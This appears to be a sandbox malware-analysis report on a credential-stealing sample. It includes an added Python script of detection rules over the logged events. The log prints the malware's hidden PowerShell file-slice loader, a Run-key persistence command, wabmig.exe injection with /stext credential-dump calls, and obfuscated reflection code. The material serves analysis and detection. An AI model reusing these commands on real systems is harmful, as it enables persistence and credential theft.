            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,19_2_00410DE1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004046B0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,17_2_00413D4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004020FE CoCreateInstance,5_2_004020FE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,17_2_0040B58D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile created: C:\Users\user\AppData\Roaming\euthanasicJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2732:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile created: C:\Users\user\AppData\Local\Temp\nswEF6A.tmpJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wabmig.exe, wabmig.exe, 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wabmig.exe, 00000011.00000002.2458030122.0000000004B1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeReversingLabs: Detection: 47%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_18-33210
            Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
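The process tree above is the whole chain in nine events: the sample spawns a hidden PowerShell, PowerShell spawns wabmig.exe (the Windows Mail address-book migration binary, which has no business being launched by PowerShell; this is the "Wab/Wabmig Unusual Parent Or Child Processes" Sigma hit), the injected wabmig.exe writes a Run value through cmd.exe and reg.exe, and then spawns three copies of itself with /stext, the output switch of the NirSoft recovery tools, which lines up with the WebBrowserPassView Yara match and the mail/browser credential-theft signatures. The script below is an added example, not Joe Sandbox or Sigma code: it encodes those three observations as rules and runs them over the report's own process-creation events, transcribed inline. EXPECTED_WAB_PARENTS is an assumed baseline for illustration, not the Sigma rule's allow-list.

```python
"""Detection rules over the process-creation events listed in this report.

Added example (not Joe Sandbox or Sigma code). EVENTS is transcribed from the
report's "Process created" lines; EXPECTED_WAB_PARENTS is an assumption
standing in for a real environment baseline.
"""
import re

# Image paths and the two long command lines, copied from the report
SAMPLE = r"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WABMIG = r"C:\Program Files (x86)\Windows Mail\wabmig.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
CONHOST = r"C:\Windows\System32\conhost.exe"
REG = r"C:\Windows\SysWOW64\reg.exe"
LOADER = r'''"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"'''
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"'''

# (parent image, child image, child command line), in report order
EVENTS = [
    ("unknown", SAMPLE, f'"{SAMPLE}"'),
    (SAMPLE, PS, LOADER),
    (PS, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (PS, WABMIG, r'"C:\Program Files (x86)\windows mail\wabmig.exe"'),
    (WABMIG, CMD, r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD),
    (CMD, CONHOST, r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (CMD, REG, REG_ADD),
    (WABMIG, WABMIG, r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"'),
    (WABMIG, WABMIG, r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"'),
    (WABMIG, WABMIG, r'"C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"'),
]

WAB_IMAGES = {"wab.exe", "wabmig.exe"}
EXPECTED_WAB_PARENTS = {"explorer.exe"}  # assumption: an illustrative baseline only
SUSPICIOUS_WAB_CHILDREN = {"cmd.exe", "reg.exe", "powershell.exe", "wab.exe", "wabmig.exe"}

RUN_KEY_RE = re.compile(r"\breg\s+add\s+\S*\\currentversion\\run\b", re.I)
ENV_REF_RE = re.compile(r"%[^%\s]+%")
STEXT_RE = re.compile(r"(?:^|\s)/stext(?:\s|$)", re.I)          # NirSoft "save as text" switch
# Get-Content ... .SubString(n, m); .$var( : a slice of file content invoked as a command
SLICE_INVOKE_RE = re.compile(r"get-content.*\.substring\([^)]*\)\s*;\s*[.&]\s*\$\w+\s*\(", re.I | re.S)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path ("unknown" stays as is)."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Return (rule, detail) findings for every event that matches a rule."""
    findings = []
    for parent, child, cmdline in events:
        p, c = image_name(parent), image_name(child)
        if (c in WAB_IMAGES and p not in EXPECTED_WAB_PARENTS) or \
           (p in WAB_IMAGES and c in SUSPICIOUS_WAB_CHILDREN):
            findings.append(("wab_unusual_parent_or_child", f"{p} -> {c}"))
        if STEXT_RE.search(cmdline):
            findings.append(("nirsoft_stext_dump", cmdline))
        m = RUN_KEY_RE.search(cmdline)
        if m:
            detail = m.group(0)
            if "REG_EXPAND_SZ" in cmdline.upper() and ENV_REF_RE.search(cmdline):
                # The interpreter is hidden behind an env var resolved at logon
                detail += " (REG_EXPAND_SZ via " + ", ".join(sorted(set(ENV_REF_RE.findall(cmdline)))) + ")"
            findings.append(("run_key_persistence", detail))
        if SLICE_INVOKE_RE.search(cmdline):
            findings.append(("powershell_file_slice_invoked", cmdline))
    return findings


def summarize(findings):
    """Count findings per rule."""
    counts = {}
    for rule, _ in findings:
        counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    hits = evaluate(EVENTS)
    for rule, detail in hits:
        print(f"{rule:32} {detail[:100]}")
    print(summarize(hits))
```

Run against the report's events, the rules fire eleven times: five unusual wab parent/child pairings (PowerShell launching wabmig.exe, wabmig.exe launching cmd.exe and three copies of itself), three /stext dumps, the Run-key write seen twice (once in the cmd.exe line, once in reg.exe), and the file-slice loader once. In a real pipeline the parent baseline comes from your own telemetry; the conhost.exe children are noise and correctly produce nothing.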
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: wintypes.dll (3 occurrences)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll (2 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: winmm.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rstrtmgr.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll (2 occurrences)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: qm.Core.pdb1 source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: tem.Core.pdb source: powershell.exe, 00000007.00000002.2404247837.0000000007602000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mation.pdb source: powershell.exe, 00000007.00000002.2399932487.0000000002F9A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2407709263.00000000087D7000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match File source: 00000007.00000002.2408058471.000000000C4AF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Lavvandstand $Sighed $Maspiter156), (Permistion @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Gynarchy = [AppDomain]::CurrentDomain.GetAssemblies()$globa
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Posy)), $Wappo).DefineDynamicModule($Syntaksfejlenes, $false).DefineType($Sekreter, $Bevisliggrelsers, [System.MulticastDelegate])$Nav
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 17_2_004044A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 12_2_23232806 push ecx; ret 12_2_23232819
